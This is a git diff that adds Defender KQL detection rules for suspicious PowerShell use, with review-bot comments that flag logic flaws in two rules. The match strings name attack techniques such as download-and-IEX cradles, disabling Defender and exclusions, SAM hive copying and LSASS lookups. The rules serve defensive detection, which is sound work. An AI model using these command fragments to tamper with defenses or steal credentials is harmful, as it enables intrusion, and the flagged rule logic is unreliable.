diff --git a/KQL/rules/windows/process_creation/powershell_base64_encoded_wmi_classes.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_wmi_classes.kql new file mode 100644 index 00000000..86b354b4 --- /dev/null +++ b/KQL/rules/windows/process_creation/powershell_base64_encoded_wmi_classes.kql 
@@ -0,0 +1,10 @@ +// Title: PowerShell Base64 Encoded WMI Classes +// Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-30 +// Level: high +// Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and ((ProcessCommandLine contains "VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg" or ProcessCommandLine contains "V2luMzJfTG9nZ2VkT25Vc2Vy" or ProcessCommandLine contains "dpbjMyX0xvZ2dlZE9uVXNlc" or ProcessCommandLine contains "XaW4zMl9Mb2dnZWRPblVzZX") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw" or ProcessCommandLine contains "cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA" or ProcessCommandLine contains "V2luMzJfUHJvY2Vzc" or ProcessCommandLine contains "dpbjMyX1Byb2Nlc3" or ProcessCommandLine contains "XaW4zMl9Qcm9jZXNz") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg" or ProcessCommandLine contains "V2luMzJfU2NoZWR1bGVkSm9i" or ProcessCommandLine contains "dpbjMyX1NjaGVkdWxlZEpvY" or ProcessCommandLine contains "XaW4zMl9TY2hlZHVsZWRKb2") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA" or ProcessCommandLine contains 
"XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A" or ProcessCommandLine contains "V2luMzJfU2hhZG93Y29we" or ProcessCommandLine contains "dpbjMyX1NoYWRvd2NvcH" or ProcessCommandLine contains "XaW4zMl9TaGFkb3djb3B5") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A" or ProcessCommandLine contains "cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA" or ProcessCommandLine contains "V2luMzJfVXNlckFjY291bn" or ProcessCommandLine contains "dpbjMyX1VzZXJBY2NvdW50" or ProcessCommandLine contains "XaW4zMl9Vc2VyQWNjb3Vud")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/powershell_defender_disable_scan_feature.kql b/KQL/rules/windows/process_creation/powershell_defender_disable_scan_feature.kql new file mode 100644 index 00000000..6254118c --- /dev/null +++ b/KQL/rules/windows/process_creation/powershell_defender_disable_scan_feature.kql 
@@ -0,0 +1,13 @@ +// Title: Powershell Defender Disable Scan Feature +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-03 +// Level: high +// Description: Detects requests to disable Microsoft Defender features using PowerShell commands +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Possible administrative activity +// - Other Cmdlets that may use the same parameters + +DeviceProcessEvents +| where ((ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains "DisableArchiveScanning " or ProcessCommandLine contains "DisableRealtimeMonitoring " or ProcessCommandLine contains "DisableIOAVProtection " or ProcessCommandLine contains "DisableBehaviorMonitoring " or ProcessCommandLine contains "DisableBlockAtFirstSeen " or ProcessCommandLine contains "DisableCatchupFullScan " or ProcessCommandLine contains "DisableCatchupQuickScan ") and (ProcessCommandLine contains "$true" or ProcessCommandLine contains " 1 ")) or ((ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBJAE8AQQBWAFAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUASQBPAEEAVgBQAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAZQBoAGEAdgBpAG8AcgBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains 
"RABpAHMAYQBiAGwAZQBCAGwAbwBjAGsAQQB0AEYAaQByAHMAdABTAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgAgA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQByAGUAYQBsAHQAaQBtAGUAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAcgBlAGEAbAB0AGkAbQBlAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAHIAZQBhAGwAdABpAG0AZQBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBpAG8AYQB2AHAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAaQBvAGEAdgBwAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGkAbwBhAHYAcAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGUAaABhAHYAaQBvAHIAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBlAGgAYQB2AGkAbwByAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAZQBoAGEAdgBpAG8AcgBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGwAbwBjAGsAYQB0AGYAaQByAHMAdABzAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBsAG8AYwBrAGEAdABmAGkAcgBzAHQAcwBlAGUAbgAgA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAbABvAGMAawBhAHQAZgBpAHIAcwB0AHMAZQBlAG4AIA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAEYAdQBsAGwAUwBjAGEAbgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAFEAdQBpAGMAawBTAGMAYQBuAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwA") or (ProcessCommandLine contains "ZGlzYWJsZWFyY2hpdmVzY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVhcmNoaXZlc2Nhbm5pbmcg" or ProcessCommandLine contains "kaXNhYmxlYXJjaGl2ZXNjYW5uaW5nI" or ProcessCommandLine contains "RGlzYWJsZUFyY2hpdmVTY2FubmluZy" or 
ProcessCommandLine contains "Rpc2FibGVBcmNoaXZlU2Nhbm5pbmcg" or ProcessCommandLine contains "EaXNhYmxlQXJjaGl2ZVNjYW5uaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJlaGF2aW9ybW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGViZWhhdmlvcm1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlYmVoYXZpb3Jtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZUJlaGF2aW9yTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVCZWhhdmlvck1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlQmVoYXZpb3JNb25pdG9yaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJsb2NrYXRmaXJzdHNlZW4g" or ProcessCommandLine contains "Rpc2FibGVibG9ja2F0Zmlyc3RzZWVuI" or ProcessCommandLine contains "kaXNhYmxlYmxvY2thdGZpcnN0c2Vlbi" or ProcessCommandLine contains "RGlzYWJsZUJsb2NrQXRGaXJzdFNlZW4g" or ProcessCommandLine contains "Rpc2FibGVCbG9ja0F0Rmlyc3RTZWVuI" or ProcessCommandLine contains "EaXNhYmxlQmxvY2tBdEZpcnN0U2Vlbi" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBmdWxsc2Nhbi" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwZnVsbHNjYW4g" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cGZ1bGxzY2FuI" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBGdWxsU2Nhbi" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwRnVsbFNjYW4g" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cEZ1bGxTY2FuI" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBxdWlja3NjYW4g" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwcXVpY2tzY2FuI" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cHF1aWNrc2Nhbi" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBRdWlja1NjYW4g" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwUXVpY2tTY2FuI" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cFF1aWNrU2Nhbi" or ProcessCommandLine contains "ZGlzYWJsZWlvYXZwcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVpb2F2cHJvdGVjdGlvbi" or ProcessCommandLine contains "kaXNhYmxlaW9hdnByb3RlY3Rpb24g" or ProcessCommandLine contains "RGlzYWJsZUlPQVZQcm90ZWN0aW9uI" or ProcessCommandLine contains 
"Rpc2FibGVJT0FWUHJvdGVjdGlvbi" or ProcessCommandLine contains "EaXNhYmxlSU9BVlByb3RlY3Rpb24g" or ProcessCommandLine contains "ZGlzYWJsZXJlYWx0aW1lbW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVyZWFsdGltZW1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlcmVhbHRpbWVtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVSZWFsdGltZU1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlUmVhbHRpbWVNb25pdG9yaW5nI")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/powershell_defender_exclusion.kql b/KQL/rules/windows/process_creation/powershell_defender_exclusion.kql new file mode 100644 index 00000000..4dd05231 --- /dev/null +++ b/KQL/rules/windows/process_creation/powershell_defender_exclusion.kql @@ -0,0 +1,13 @@ +// Title: Powershell Defender Exclusion +// Author: Florian Roth (Nextron Systems) +// Date: 2021-04-29 +// Level: medium +// Description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Possible Admin Activity +// - Other Cmdlets that may use the same parameters + +DeviceProcessEvents +| where (ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains " -ExclusionPath " or ProcessCommandLine contains " -ExclusionExtension " or ProcessCommandLine contains " -ExclusionProcess " or ProcessCommandLine contains " -ExclusionIpAddress ") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql b/KQL/rules/windows/process_creation/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql new file mode 100644 index 00000000..191d79af --- /dev/null 
+++ b/KQL/rules/windows/process_creation/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql
@@ -0,0 +1,14 @@
+// Title: PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction'
+// Author: Matt Anderson (Huntress)
+// Date: 2025-07-11
+// Level: high
+// Description: Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9').
+// This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level.
+// An attacker might use this technique via the command line to bypass defenses before executing payloads.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Highly unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-LowThreatDefaultAction" or ProcessCommandLine contains "-ModerateThreatDefaultAction" or ProcessCommandLine contains "-HighThreatDefaultAction" or ProcessCommandLine contains "-SevereThreatDefaultAction" or ProcessCommandLine contains "-ltdefac " or ProcessCommandLine contains "-mtdefac " or ProcessCommandLine contains "-htdefac " or ProcessCommandLine contains "-stdefac ") and ProcessCommandLine contains "Set-MpPreference" and (ProcessCommandLine contains "Allow" or ProcessCommandLine contains "6" or ProcessCommandLine contains "NoAction" or ProcessCommandLine contains "9")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_download_and_execution_cradles.kql b/KQL/rules/windows/process_creation/powershell_download_and_execution_cradles.kql
new file mode 100644
index 00000000..54afef52
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_download_and_execution_cradles.kql
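Review bot: The value clause `(ProcessCommandLine contains "Allow" or ProcessCommandLine contains "6" or ProcessCommandLine contains "NoAction" or ProcessCommandLine contains "9")` matches a 6 or 9 anywhere in the command line — in a path, a GUID, a port or an unrelated parameter — so in practice the rule fires on every `Set-MpPreference` call that names one of the *ThreatDefaultAction parameters, whatever action is actually set, which sits uneasily with `Level: high` and `False Positives: Highly unlikely`. If this is a faithful rendering of the Sigma source, a `// NOTE: the numeric value checks are unanchored substring matches` line under False Positives should say so; otherwise the digits belong next to the parameter they qualify, along the lines of `ProcessCommandLine matches regex @"(ThreatDefaultAction|tdefac)\s+[69]\b"`, keeping the `Allow`/`NoAction` substring checks as they are. I cannot see the source rule from this diff, so which of the two applies needs confirming against it.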
@@ -0,0 +1,12 @@
+// Title: PowerShell Download and Execution Cradles
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-24
+// Level: high
+// Description: Detects PowerShell download and execution cradles.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Some PowerShell installers were seen using similar combinations. Apply filters accordingly
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Invoke-RestMethod " or ProcessCommandLine contains "irm ") and (ProcessCommandLine contains ";iex $" or ProcessCommandLine contains "| IEX" or ProcessCommandLine contains "|IEX " or ProcessCommandLine contains "I`E`X" or ProcessCommandLine contains "I`EX" or ProcessCommandLine contains "IE`X" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "IEX (" or ProcessCommandLine contains "IEX(" or ProcessCommandLine contains "Invoke-Expression")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_download_pattern.kql b/KQL/rules/windows/process_creation/powershell_download_pattern.kql
new file mode 100644
index 00000000..99ceb540
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_download_pattern.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Download Pattern
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects a Powershell process that contains download commands in its command line string
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "string(" or ProcessCommandLine contains "file(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "net.webclient)." and ProcessCommandLine contains "download")) and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_executed_from_headless_conhost_process.kql b/KQL/rules/windows/process_creation/powershell_executed_from_headless_conhost_process.kql
new file mode 100644
index 00000000..aae7fe6a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_executed_from_headless_conhost_process.kql
@@ -0,0 +1,11 @@
+// Title: Powershell Executed From Headless ConHost Process
+// Author: Matt Anderson (Huntress)
+// Date: 2024-07-23
+// Level: medium
+// Description: Detects the use of powershell commands from headless ConHost window.
+// The "--headless" flag hides the windows from the user upon execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1564.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--headless" and ProcessCommandLine contains "powershell") and (FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_execution_with_potential_decryption_capabilities.kql b/KQL/rules/windows/process_creation/powershell_execution_with_potential_decryption_capabilities.kql
new file mode 100644
index 00000000..fc099042
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_execution_with_potential_decryption_capabilities.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Execution With Potential Decryption Capabilities
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-30
+// Level: high
+// Description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Get-ChildItem " or ProcessCommandLine contains "dir " or ProcessCommandLine contains "gci " or ProcessCommandLine contains "ls ") and (ProcessCommandLine contains "Get-Content " or ProcessCommandLine contains "gc " or ProcessCommandLine contains "cat " or ProcessCommandLine contains "type " or ProcessCommandLine contains "ReadAllBytes") and ((ProcessCommandLine contains " ^| " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "-Recurse" and ProcessCommandLine contains "-Skip ") or (ProcessCommandLine contains " -ExpandProperty " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "WriteAllBytes" and ProcessCommandLine contains " .length ")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_get_clipboard_cmdlet_via_cli.kql b/KQL/rules/windows/process_creation/powershell_get_clipboard_cmdlet_via_cli.kql
new file mode 100644
index 00000000..ce241746
--- /dev/null
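Review bot: The process-identity clause at the end of the `| where` line joins the image-path and OriginalFileName alternatives with `and` — `((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))` — whereas every other PowerShell rule in this commit (the Invoke keyword, WMI classes, download pattern, MSI install rules) joins the same pair with `or`. Requiring both drops an event whose version metadata is absent or differs even though the path already matched; presumably the Sigma source lists the two as alternatives, as the sibling rules do, in which case this is a conversion defect and the `and` should read `or`. That is worth confirming against the source rule rather than hand-editing the generated file. The description also carries a stray quote in `".LNK" "file`, which looks inherited from the source text.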
+++ b/KQL/rules/windows/process_creation/powershell_get_clipboard_cmdlet_via_cli.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Get-Clipboard Cmdlet Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-05-02
+// Level: medium
+// Description: Detects usage of the 'Get-Clipboard' cmdlet via CLI
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1115
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Get-Clipboard"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_get_process_lsass.kql b/KQL/rules/windows/process_creation/powershell_get_process_lsass.kql
new file mode 100644
index 00000000..7350a45e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_get_process_lsass.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Get-Process LSASS
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-04-23
+// Level: high
+// Description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.004
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Get-Process lsas" or ProcessCommandLine contains "ps lsas" or ProcessCommandLine contains "gps lsas"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_inline_execution_from_a_file.kql b/KQL/rules/windows/process_creation/powershell_inline_execution_from_a_file.kql
new file mode 100644
index 00000000..87aaddb7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_inline_execution_from_a_file.kql
@@ -0,0 +1,10 @@
+// Title: Powershell Inline Execution From A File
+// Author: frack113
+// Date: 2022-12-25
+// Level: medium
+// Description: Detects inline execution of PowerShell code from a file
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-Expression " or ProcessCommandLine contains "Invoke-Command " or ProcessCommandLine contains "icm ") and ProcessCommandLine contains " -raw" and (ProcessCommandLine contains "cat " or ProcessCommandLine contains "get-content " or ProcessCommandLine contains "type ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql b/KQL/rules/windows/process_creation/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql
new file mode 100644
index 00000000..44476920
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql
@@ -0,0 +1,13 @@
+// Title: PowerShell MSI Install via WindowsInstaller COM From Remote Location
+// Author: Meroujan Antonyan (vx3r)
+// Date: 2025-06-05
+// Level: medium
+// Description: Detects the execution of PowerShell commands that attempt to install MSI packages via the
+// Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely.
+// This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality.
+// And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-ComObject" and ProcessCommandLine contains "InstallProduct(") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "http" or ProcessCommandLine contains "\\\\")) and (not((ProcessCommandLine contains "://127.0.0.1" or ProcessCommandLine contains "://localhost")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_sam_copy.kql b/KQL/rules/windows/process_creation/powershell_sam_copy.kql
new file mode 100644
index 00000000..7852a2fb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_sam_copy.kql
@@ -0,0 +1,13 @@
+// Title: PowerShell SAM Copy
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-29
+// Level: high
+// Description: Detects suspicious PowerShell scripts accessing SAM hives
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+// False Positives:
+// - Some rare backup scenarios
+// - PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\HarddiskVolumeShadowCopy" and ProcessCommandLine contains "System32\\config\\sam") and (ProcessCommandLine contains "Copy-Item" or ProcessCommandLine contains "cp $_." or ProcessCommandLine contains "cpi $_." or ProcessCommandLine contains "copy $_." or ProcessCommandLine contains ".File]::Copy(")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_script_change_permission_via_set_acl.kql b/KQL/rules/windows/process_creation/powershell_script_change_permission_via_set_acl.kql
new file mode 100644
index 00000000..d2600bfa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_script_change_permission_via_set_acl.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Script Change Permission Via Set-Acl
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-18
+// Level: high
+// Description: Detects PowerShell execution to set the ACL of a file or a folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject " and ProcessCommandLine contains "-Path ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_script_run_in_appdata.kql b/KQL/rules/windows/process_creation/powershell_script_run_in_appdata.kql
new file mode 100644
index 00000000..c45b5f25
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_script_run_in_appdata.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Script Run in AppData
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2019-01-09
+// Level: medium
+// Description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Administrative scripts
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "powershell.exe" or ProcessCommandLine contains "\\powershell" or ProcessCommandLine contains "\\pwsh" or ProcessCommandLine contains "pwsh.exe") and ((ProcessCommandLine contains "Local\\" or ProcessCommandLine contains "Roaming\\") and (ProcessCommandLine contains "/c " and ProcessCommandLine contains "\\AppData\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_set_acl_on_windows_folder.kql b/KQL/rules/windows/process_creation/powershell_set_acl_on_windows_folder.kql
new file mode 100644
index 00000000..350ecce2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_set_acl_on_windows_folder.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Set-Acl On Windows Folder
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-18
+// Level: high
+// Description: Detects PowerShell scripts to set the ACL to a file in the Windows folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "-Path \"C:\\Windows" or ProcessCommandLine contains "-Path 'C:\\Windows" or ProcessCommandLine contains "-Path %windir%" or ProcessCommandLine contains "-Path $env:windir") and (ProcessCommandLine contains "FullControl" or ProcessCommandLine contains "Allow")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_token_obfuscation_process_creation.kql b/KQL/rules/windows/process_creation/powershell_token_obfuscation_process_creation.kql
new file mode 100644
index 00000000..7904ae91
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_token_obfuscation_process_creation.kql
@@ -0,0 +1,10 @@
+// Title: Powershell Token Obfuscation - Process Creation
